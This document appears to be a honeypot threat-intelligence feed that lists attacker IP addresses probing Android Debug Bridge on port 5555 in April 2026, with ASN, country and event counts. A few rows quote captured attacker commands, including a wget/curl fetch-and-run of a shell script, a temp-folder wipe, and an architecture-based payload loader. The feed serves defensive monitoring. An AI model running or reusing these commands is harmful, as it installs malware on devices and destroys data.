IPv4	172.236.111.197	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-06T15:47:25.000Z \| last_seen=2026-04-06T15:48:31.105Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	23.92.27.206	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-06T15:47:00.000Z \| last_seen=2026-04-06T15:48:09.160Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	37.26.100.145	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=MK; asn=208730; asn_org=Inel Tehnik Dooel; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T16:36:10.000Z \| last_seen=2026-04-06T16:46:14.576Z \| ports=5555 \| cc=MK \| asn=208730 \| org=Inel Tehnik Dooel	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	87.121.84.49	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=US; asn=215925; asn_org=Vpsvault.host Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=285 \| first_seen=2026-04-06T16:48:09.000Z \| last_seen=2026-04-22T15:47:23.485Z \| ports=5555 \| cc=US \| asn=215925 \| org=Vpsvault.host Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	66.132.195.147	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-06T18:18:01.000Z \| last_seen=2026-04-06T18:19:40.073Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	93.123.109.61	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=BG; asn=48090; asn_org=Techoff Srv Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-06T18:58:28.000Z \| last_seen=2026-04-06T18:59:31.747Z \| ports=5555 \| cc=BG \| asn=48090 \| org=Techoff Srv Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	205.210.31.228	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=22 \| first_seen=2026-04-06T19:05:02.000Z \| last_seen=2026-04-06T19:16:32.971Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	179.24.30.193	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=UY; asn=6057; asn_org=Administracion Nacional de Telecomunicaciones; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T20:54:55.000Z \| last_seen=2026-04-06T21:05:00.226Z \| ports=5555 \| cc=UY \| asn=6057 \| org=Administracion Nacional de Telecomunicaciones	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	208.58.104.21	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6079; asn_org=RCN; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T20:19:16.000Z \| last_seen=2026-04-06T20:29:20.322Z \| ports=5555 \| cc=US \| asn=6079 \| org=RCN	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	148.222.132.14	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=MX; asn=14593; asn_org=Space Exploration Technologies Corporation; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T21:58:19.000Z \| last_seen=2026-04-06T22:08:29.245Z \| ports=5555 \| cc=MX \| asn=14593 \| org=Space Exploration Technologies Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	177.23.43.210	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BR; asn=263038; asn_org=SkyNet Prestacao S.C.M. LTDA. ME.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-06T21:09:42.000Z \| last_seen=2026-04-06T21:10:49.533Z \| ports=5555 \| cc=BR \| asn=263038 \| org=SkyNet Prestacao S.C.M. LTDA. ME.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	197.0.220.158	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=TN; asn=37705; asn_org=TOPNET; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T21:15:29.000Z \| last_seen=2026-04-06T21:25:35.382Z \| ports=5555 \| cc=TN \| asn=37705 \| org=TOPNET	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	42.242.156.200	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-06T21:10:50.000Z \| last_seen=2026-04-06T21:12:24.116Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-06
IPv4	5.156.136.225	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=SA; asn=39891; asn_org=Saudi Telecom Company JSC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-06T23:08:58.000Z \| last_seen=2026-04-06T23:19:09.136Z \| ports=5555 \| cc=SA \| asn=39891 \| org=Saudi Telecom Company JSC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	178.174.225.7	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=SE; asn=8473; asn_org=Bahnhof AB; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-07T00:24:39.000Z \| last_seen=2026-04-07T00:34:44.675Z \| ports=5555 \| cc=SE \| asn=8473 \| org=Bahnhof AB	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	134.209.186.164	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=GB; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-07T01:59:10.000Z \| last_seen=2026-04-07T02:09:21.893Z \| ports=5555 \| cc=GB \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	181.78.79.21	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=CO; asn=52468; asn_org=UFINET PANAMA S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-07T01:22:40.000Z \| last_seen=2026-04-07T01:32:43.318Z \| ports=5555 \| cc=CO \| asn=52468 \| org=UFINET PANAMA S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	222.168.132.58	Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=8; cmd="rm -rf /data/local/tmp/*" Observed in ADBHoney telemetry for 2026-04. events=31 \| first_seen=2026-04-07T01:59:07.000Z \| last_seen=2026-04-07T02:14:10.609Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-07
IPv4	104.248.58.73	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-07T02:13:29.000Z \| last_seen=2026-04-07T02:14:35.502Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	175.20.237.2	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=11 \| first_seen=2026-04-07T02:04:09.000Z \| last_seen=2026-04-07T02:14:10.609Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	104.231.16.205	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=10796; asn_org=Charter Communications Inc; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-07T03:40:40.000Z \| last_seen=2026-04-07T03:50:50.130Z \| ports=5555 \| cc=US \| asn=10796 \| org=Charter Communications Inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	109.191.177.184	Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=RU; asn=8369; asn_org=Intersvyaz-2 JSC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=26 \| first_seen=2026-04-07T03:03:05.000Z \| last_seen=2026-04-07T03:22:42.149Z \| ports=5555 \| cc=RU \| asn=8369 \| org=Intersvyaz-2 JSC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	177.37.154.1	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=BR; asn=28126; asn_org=BRISANET SERVICOS DE TELECOMUNICACOES S.A; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-07T03:06:17.000Z \| last_seen=2026-04-07T03:16:23.967Z \| ports=5555 \| cc=BR \| asn=28126 \| org=BRISANET SERVICOS DE TELECOMUNICACOES S.A	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	197.225.74.1	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=MU; asn=23889; asn_org=MauritiusTelecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-07T03:39:21.000Z \| last_seen=2026-04-07T03:49:23.587Z \| ports=5555 \| cc=MU \| asn=23889 \| org=MauritiusTelecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	64.62.156.222	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=19 \| first_seen=2026-04-07T03:54:31.000Z \| last_seen=2026-04-20T09:02:03.500Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	64.62.156.231	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-07T03:51:59.000Z \| last_seen=2026-04-07T03:53:07.529Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	66.132.195.120	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-07T04:32:25.000Z \| last_seen=2026-04-07T04:33:43.103Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	45.95.147.229	Attacker IP • ADB / seen in ADBHoney; events=35; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=526 \| first_seen=2026-04-07T05:24:10.000Z \| last_seen=2026-04-13T22:27:07.339Z \| ports=5555 \| cc=NL \| asn=49870 \| org=Alsycon B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	176.29.156.36	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=JO; asn=48832; asn_org=Jordanian mobile phone services Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-07T07:02:55.000Z \| last_seen=2026-04-07T07:13:01.961Z \| ports=5555 \| cc=JO \| asn=48832 \| org=Jordanian mobile phone services Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	178.128.250.123	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=NL; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=19 \| first_seen=2026-04-07T08:11:49.000Z \| last_seen=2026-04-07T08:22:24.323Z \| ports=5555 \| cc=NL \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	24.144.81.217	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=15 \| first_seen=2026-04-07T08:20:27.000Z \| last_seen=2026-04-07T08:30:41.950Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	5.187.35.26	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=NL; asn=206264; asn_org=Amarutu Technology Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=47 \| first_seen=2026-04-07T13:21:40.000Z \| last_seen=2026-04-26T19:00:09.488Z \| ports=5555 \| cc=NL \| asn=206264 \| org=Amarutu Technology Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	76.33.249.167	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=20001; asn_org=Charter Communications Inc; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-07T13:23:24.000Z \| last_seen=2026-04-07T13:33:30.082Z \| ports=5555 \| cc=US \| asn=20001 \| org=Charter Communications Inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	102.157.38.179	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=TN; asn=37705; asn_org=TOPNET; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-07T14:11:32.000Z \| last_seen=2026-04-07T14:21:39.432Z \| ports=5555 \| cc=TN \| asn=37705 \| org=TOPNET	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	41.251.189.2	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=MA; asn=36903; asn_org=MT-MPLS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-07T15:01:56.000Z \| last_seen=2026-04-07T15:12:05.127Z \| ports=5555 \| cc=MA \| asn=36903 \| org=MT-MPLS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	45.33.40.18	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=10 \| first_seen=2026-04-07T15:47:00.000Z \| last_seen=2026-04-27T15:47:46.589Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	185.141.119.121	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=38 \| first_seen=2026-04-07T16:22:34.000Z \| last_seen=2026-04-08T21:44:24.623Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	103.116.52.132	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=VN; asn=150895; asn_org=EZ TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0; cmd="cd /data/local/tmp/; rm -rf *; busybox wget http://103.116.52.132/abc1.sh; sh abc1.sh; wget http://103.116.52.132/abc1.sh; sh abc1.sh; curl http://103.116.52.13" Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-07T17:53:26.000Z \| last_seen=2026-04-07T17:55:23.819Z \| ports=5555 \| cc=VN \| asn=150895 \| org=EZ TECHNOLOGY COMPANY LIMITED	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	20.61.127.50	Attacker IP • ADB / seen in ADBHoney; events=35; ports=5555; cc=NL; asn=8075; asn_org=Microsoft Corporation; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=35 \| first_seen=2026-04-07T17:12:35.000Z \| last_seen=2026-04-07T17:24:24.640Z \| ports=5555 \| cc=NL \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	186.249.149.176	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=BR; asn=28649; asn_org=Desktop Sigmanet Comunicacao Multimidia SA; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-07T18:27:49.000Z \| last_seen=2026-04-07T18:37:56.740Z \| ports=5555 \| cc=BR \| asn=28649 \| org=Desktop Sigmanet Comunicacao Multimidia SA	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	196.238.196.186	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=TN; asn=37492; asn_org=ORANGE; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-07T18:16:56.000Z \| last_seen=2026-04-07T18:26:59.813Z \| ports=5555 \| cc=TN \| asn=37492 \| org=ORANGE	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	88.183.110.228	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=FR; asn=12322; asn_org=Free SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-07T20:44:42.000Z \| last_seen=2026-04-08T05:06:47.271Z \| ports=5555 \| cc=FR \| asn=12322 \| org=Free SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-07
IPv4	198.235.24.200	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=22 \| first_seen=2026-04-07T23:38:08.000Z \| last_seen=2026-04-07T23:49:47.200Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	193.32.162.211	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=RO; asn=47890; asn_org=Unmanaged Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-08T00:29:31.000Z \| last_seen=2026-04-08T00:30:40.624Z \| ports=5555 \| cc=RO \| asn=47890 \| org=Unmanaged Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	65.49.1.132	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-08T03:42:05.000Z \| last_seen=2026-04-08T03:52:11.380Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	65.49.1.140	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-08T03:40:47.000Z \| last_seen=2026-04-08T03:41:51.325Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	141.98.10.182	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LT; asn=209605; asn_org=UAB Host Baltic; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-08T08:46:28.000Z \| last_seen=2026-04-08T08:47:28.941Z \| ports=5555 \| cc=LT \| asn=209605 \| org=UAB Host Baltic	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	68.43.126.72	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-08T08:45:26.000Z \| last_seen=2026-04-08T08:55:28.638Z \| ports=5555 \| cc=US \| asn=7922 \| org=Comcast Cable Communications, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	37.60.241.154	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=FR; asn=51167; asn_org=Contabo GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=19 \| first_seen=2026-04-08T09:49:59.000Z \| last_seen=2026-04-16T15:24:21.189Z \| ports=5555 \| cc=FR \| asn=51167 \| org=Contabo GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	176.65.139.60	Attacker IP • ADB / seen in ADBHoney; events=29; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=2; cmd="pkill target; cd /data/local/tmp/; export PATH=$PATH:/data/local/tmp:/system/bin:/system/xbin; arch=$(uname -m); case $arch in arm) target=zyre.arm7;; 86\|64" Observed in ADBHoney telemetry for 2026-04. events=114 \| first_seen=2026-04-08T10:31:12.000Z \| last_seen=2026-04-10T14:07:32.706Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	187.189.146.12	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=MX; asn=17072; asn_org=TOTAL PLAY TELECOMUNICACIONES SA DE CV; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-08T10:02:57.000Z \| last_seen=2026-04-08T10:12:58.867Z \| ports=5555 \| cc=MX \| asn=17072 \| org=TOTAL PLAY TELECOMUNICACIONES SA DE CV	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	185.217.0.181	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=SE; asn=42237; asn_org=w1n ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-08T11:59:41.000Z \| last_seen=2026-04-08T12:00:43.444Z \| ports=5555 \| cc=SE \| asn=42237 \| org=w1n ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	184.105.247.195	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-08T13:50:02.000Z \| last_seen=2026-04-12T06:34:00.708Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	184.105.247.203	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-08T13:48:16.000Z \| last_seen=2026-04-08T13:49:22.553Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	204.76.203.175	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=15 \| first_seen=2026-04-08T13:01:54.000Z \| last_seen=2026-04-08T15:04:36.287Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	93.123.109.124	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=BG; asn=48090; asn_org=Techoff Srv Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-08T13:34:03.000Z \| last_seen=2026-04-08T13:35:06.677Z \| ports=5555 \| cc=BG \| asn=48090 \| org=Techoff Srv Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	104.237.156.209	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-08T15:46:56.000Z \| last_seen=2026-04-08T15:48:05.885Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	204.76.203.176	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=10 \| first_seen=2026-04-08T15:03:35.000Z \| last_seen=2026-04-08T15:04:49.185Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	204.76.203.177	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-08T15:03:25.000Z \| last_seen=2026-04-08T15:04:42.281Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	204.76.203.178	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-08T15:03:35.000Z \| last_seen=2026-04-08T15:04:54.229Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	83.198.211.85	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=RE; asn=3215; asn_org=Orange; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-08T15:57:29.000Z \| last_seen=2026-04-08T16:07:33.435Z \| ports=5555 \| cc=RE \| asn=3215 \| org=Orange	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	185.91.69.5	Attacker IP • ADB / seen in ADBHoney; events=73; ports=5555; cc=GB; asn=201579; asn_org=Hostgnome Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=73 \| first_seen=2026-04-08T17:05:57.000Z \| last_seen=2026-04-08T17:17:18.593Z \| ports=5555 \| cc=GB \| asn=201579 \| org=Hostgnome Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
IPv4	187.193.200.169	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=MX; asn=8151; asn_org=UNINET; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-08T18:51:00.000Z \| last_seen=2026-04-08T19:01:03.250Z \| ports=5555 \| cc=MX \| asn=8151 \| org=UNINET	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-08
